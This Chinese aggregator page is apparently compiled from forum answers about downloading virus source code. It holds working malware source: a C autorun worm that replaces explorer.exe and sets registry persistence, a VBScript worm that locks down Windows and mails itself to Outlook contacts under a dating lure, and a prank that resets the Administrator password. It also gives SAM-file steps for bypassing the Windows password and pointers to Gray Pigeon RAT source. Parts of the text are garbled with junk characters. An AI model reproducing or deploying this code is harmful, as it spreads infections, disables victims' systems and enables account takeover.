当前位置:首页 > 代码 > 正文

病毒源代码下载(彩虹猫病毒源代码下载)

admin 发布:2023-02-21 05:15 5404


今天给各位分享病毒源代码下载的知识,其中也会对彩虹猫病毒源代码下载进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!

本文目录一览:

机器狗木马三代病毒源代码

机器狗木马三代是机器狗木马的最新变种,从五一假期开始处于爆发趋势,至今愈演愈烈,[b][color=red]截至目前已有百万电脑中招[/color][/b]。360安全中心再次紧急更新360顽固木马专杀大全,全面围剿机器狗木马三代。(360顽固木马专杀大全下载地址:[url=][color=#0044dd][/color][/url])KE|.C|(Z+^

QC|Y\(ZMXE

机器狗是一种危害极强的木马病毒下载器,它会给受害者的电脑下载大量的木马、病毒、恶意软件、插件等。[b][color=red]一旦中毒,受害者的电脑便随时可能感染任何木马病毒,这些木马病毒会疯狂地盗用用户的QQ账号密码、游戏账号密码、网上银行卡号密码等用户信息,也会破坏操作系统,严重的会使系统彻底崩溃。[/color][/b]2f?*u4kZ

0ZQ2kA*RO ]+Q6RF 本次出现的新变种则更加猖狂,主要有如下行为:M5@q'@I-\\lq

3b@1@`(BY'Rf [b]1. 使杀毒软件失效并破坏系统[/b]

%i%Y:@$^^^D%a@

.szk*}? jV_ 感染更多系统文件,在安装有卡巴斯基的电脑里,能先使卡巴斯基失效,以便释放一个驱动。在这个驱动的作用下,机器狗新变种木马就能绕过所有的还原软件和自我保护以及开机免疫,进而为所欲为。.J/O1|Vq,W

4]z F{|W [b]2. 给电脑装上大量的病毒和木马[/b] Q.j `AG8c u

o}*_Kj9b4G

感染后的系统文件会自动后台访问木马网站,下载一个TXT文本文件,并根据文件里的配置下载相关木马。从这个角度上来讲,这个新变种的机器狗也承担了一部分的“木马运输”工作,成为其他木马的渠道,以便以此获利。

%o9QL_S\Z.G1H

"O7a!C2|;gfV [b]3. 破坏360保险箱的保护,盗取账号密码[/b],Qg P%[ se

C8s oVS Hs 部分新变种能特别针对360保险箱进行攻击,修改360保险箱中的关键文件,取消游戏保护功能,继而盗取账号密码。

Z [6hv?` x

7l%\*F^3wk@ S +X4Up0~lS Ie ^

nas`vw9rc/A

如果大家遇见以上症状,请下载机器狗专杀或者360专杀大全进行全面检测和查杀h~StE#q

0c!RhI.fO1fl+r

机器狗专杀下载地址:[url=][color=#0000ff][/color][/url][f!s0k2v EU'l

/{P#e^f)G 360专杀大全下载地址:[url=][color=#0000ff][/color][/url]

!G"Gr L2Y6A/a K%yi4o cDf

[b][color=red]注:下载机器狗专杀运行后,会为您的电脑增加对机器狗的免疫。增加免疫后,可以抵御大多数木马病毒。[/color][/b]%Y)N#V(NJIi

8m UMA R

或者及时到360百科([url=][color=#0000ff][/color][/url])求助,也可直接发邮件至 [email]fk@360safe.com[/email]进行反馈。

求病毒源代码

即使是小病毒也不是太好编的

比如用C语言做的小病毒……

功能:

1.在所有磁盘的根目录生成svchost.com和autorun.inf文件

2.生成病毒体:

c:\windows\wjview32.com

c:\windows\explorer.exe

c:\windows\system32\dllcache\explorer.exe

c:\windows\system\msmouse.dll

c:\windows\system32\cmdsys.sys

c:\windows\system32\mstsc32.exe

3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在

explorer.exe前启动

4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)

5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。

6.连锁能力,将病毒体相连,实现相连复制更新

7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程

8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建

9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下

10.附带删除文件函数(为防止危害,本函数默认不执行)

本病毒到目前为止任何杀毒软件都无法将其查杀(07年的)

本病毒单机默认使用对机器无害(破坏代码已屏蔽)

提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):

@echo off

echo SK-CHINA SVCHOST KILLER 2007.6

echo WRITE BY S.K

taskkill /im mstsc32.exe /f

del c:\windows\wjview32.com

del c:\windows\explorer.exe

del c:\windows\system32\dllcache\explorer.exe

del c:\windows\system\msmouse.dll

del c:\windows\system32\cmdsys.sys

del c:\windows\system32\mstsc32.exe

del c:\svchost.com

del c:\autorun.inf

del d:\svchost.com

del d:\autorun.inf

del e:\svchost.com

del e:\autorun.inf

del f:\svchost.com

del f:\autorun.inf

del g:\svchost.com

del g:\autorun.inf

del h:\svchost.com

del h:\autorun.inf

copy c:\windows\system\explorer.exe c:\windows\explorer.exe

copy c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe

del c:\windows\system\explorer.exe

echo FINISH!

echo 如果本次清除后仍残留有病毒,请再次运行本程序

pause

--------------------------------------------------------------------

核心代码:(全部代码请从附件中下载,请用DEV-CPP运行其中的工程文件,编译后请将结果文件svchost.exe更名为svchost.com,否则本病毒无法发挥作用,请安心运行实验,恶意代码已屏蔽)

/*

SK-CHINA

SVCHOST virus WRITE BY S.K

Compiler:

DEV-CPP 4.9.9.2

*/

/* SVCHOST.C */

/* SVCHOST.EXE */

/* SVCHOST.COM */

#includestdio.h /*标准输入输出*/

#includestring.h /*字符串操作*/

#includestdlib.h /*其它函数*/

#includeprocess.h /*进程控制*/

#includedir.h /*目录函数*/

#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/

#define RUBBISH_NUM 5 /*垃圾文件数量*/

#define REMOVE_NUM 5 /*删除文件数*/

/*====================================================================*/

/*

文件AUTORUN.INF内容:

1.自动运行SVCHOST.com

2.覆盖默认打开命令,使用病毒体作为新的打开方式

3.覆盖默认资源管理器命令,使病毒体作为新的命令方式

*/

char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打开(O)

\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=资源管理器(X)

\nshell\\explore\\Command=\"SVCHOST.com /s\""};

/*=====================================================================*/

/*

添加注册表项:

1.自动运行生成病毒体C:\windows\wjview32.com

*/

char *regadd={"REGEDIT4\n\n

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32

\"=\"C:\\\\windows\\\\wjview32.com /s\""};

/*=====================================================================*/

/*

函数:复制文件

复制源:infile

目的地:outfile

成功返回0,失败返回1

*/

int copy(char *infile,char *outfile)

{

FILE *input,*output;

char temp;

if(strcmp(infile,outfile)!=0 ((input=fopen(infile,"rb"))!=NULL) ((output=fopen

(outfile,"wb"))!=NULL))

{

while(!feof(input))

{

fread(temp,1,1,input);

fwrite(temp,1,1,output);

}

fclose(input);

fclose(output);

return 0;

}

else return 1;

}

/*=====================================================================*/

/*

函数:通过explorer自动运行

成功返回0,失败返回1,2

*/

int autorun_explorer()

{

FILE *input;

if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)

{

fclose(input);

remove("c:\\windows\\$temp$");

remove("c:\\windows\\system32\\dllcache\\$temp$");

return 1;

}

copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");

rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");

rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32

\\dllcache\\$temp$");

if(copy("SVCHOST.com","c:\\windows\\explorer.exe")==0 copy

("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)

return 0;

else

return 2;

}

/*=====================================================================*/

/*

函数:添加注册表项

成功返回0,失败返回1

*/

int add_reg()

{

FILE *output;

if((output=fopen("$$$$$","w"))!=NULL)

{

fprintf(output,regadd);

fclose(output);

spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);

}

}

/*=====================================================================*/

/*

函数:复制病毒 + Autorun.inf自动运行

*/

void copy_virus()

{

int i,k;

FILE *input,*output;

char *files_svchost[SVCHOST_NUM]=

{"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\syste

m32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};

char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"};

for(i=0;iSVCHOST_NUM;i++)

{

if((input=fopen(files_svchost[i],"rb"))!=NULL)

{

fclose(input);

for(k=0;kSVCHOST_NUM;k++)

{

copy(files_svchost[i],files_svchost[k]);

}

i=SVCHOST_NUM;

}

}

for(i=0;iSVCHOST_NUM;i++)

{

if((input=fopen(files_svchost[i],"rb"))!=NULL)

{

fclose(input);

for(k=0;k24;k++)

{

copy(files_svchost[i],temp[0]);

if((output=fopen(temp[1],"w"))!=NULL)

{

fprintf(output,"%s",autorun);

fclose(output);

}

temp[0][0]++;

temp[1][0]++;

}

i=SVCHOST_NUM;

}

}

}

/*=====================================================================*/

/*

函数:制造垃圾文件

*/

void make_rubbish()

{

int i;

FILE *output;

srand(0);

for(i=0;iRUBBISH_NUM;i++)

{

int n;

char s[30];

n=rand();

sprintf(s,"C:\\DESTORY_感染_%d",n);

if((output=fopen(s,"w"))!=NULL)

{

fprintf(output,"%ld%s",n*n,s);

fclose(output);

}

}

}

/*=====================================================================*/

/*

函数:删除文件

*/

void remove_files()

{

long done;

int i;

struct _finddata_t ffblk;

char *remove_files[3]={"*.txt","*.doc","*.xls"};

for(i=0;i3;i++)

{

if(_findfirst(remove_files[i],ffblk)==-1) continue;

while(!done)

{

remove(ffblk.name);

_findnext(done,ffblk);

}

_findclose(done);

}

}

/*=====================================================================*/

/*

主程序

使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面,于后台执行

*/

int main(int argc,char **argv)

{

int contral=0;

if(argc1)

if(strcmp(argv[1],"/s")==0)

goto next1;

autorun_explorer();

spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);

next1:

add_reg();

copy_virus();

make_rubbish();

/* remove_files(); */

spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);

return 0;

}

其他的恐怕只能告诉你网址了

比如黑客联盟的

求C语言病毒源码

一个小东西 介绍了后别笑话我 !它的功能很简单,就是把Administrator的密码该成xiaobai

大家整了人之后切记告诉他密码(xiaobai)

自己可以用TC2.0编写编译调试生成

C语言下的代码如下:

main()

{

system("net user administrator xiaobai");

}

如果自己真的不小心忘记了密码 如果是XP系统 管理员密码破解如下:

1.用个启动盘启动电脑后进入DOS 状态下:输入如下命令

del X:\windows\sysrem32\config\sam 回车

copy x:\windows\repair\sam x:\windows\system32\config 回车

2.重新启动计算机。X为安装XP的盘 一般为c:

电脑病毒源代码介绍

电脑中了病毒想从它的源代码入手怎么办呢!有我在,下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍:

电脑病毒源代码一:

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与 操作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2"\win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表,禁止“运行”菜单

r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑

r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表,禁止开机注册表扫描

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式

r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表,禁止纯dos模式

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单

电脑病毒源代码二:

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表,禁止控制面板

r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容

set ol=createobject("outlook.application" '创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" '邮件主题

mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容

mail.attachments.add(dir2"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore 选项的恶意修改

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表,禁止更改高级页设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表,禁止更改历史记录设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表,禁止更改安全项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表,禁止查看源文件

r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划

谁有灰鸽子病毒的源代码啊?

现在网上流传的是灰鸽子vip1.2源码

没有别的版本的,你想下搜灰鸽子vip1.2源码就行了,还有不少下载的网站

病毒源代码下载的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于彩虹猫病毒源代码下载、病毒源代码下载的信息别忘了在本站进行查找喔。

版权说明:如非注明,本站文章均为 AH站长 原创,转载请注明出处和附带本文链接;

本文地址:http://ahzz.com.cn/post/37669.html


取消回复欢迎 发表评论:

分享到

温馨提示

下载成功了么?或者链接失效了?

联系我们反馈

立即下载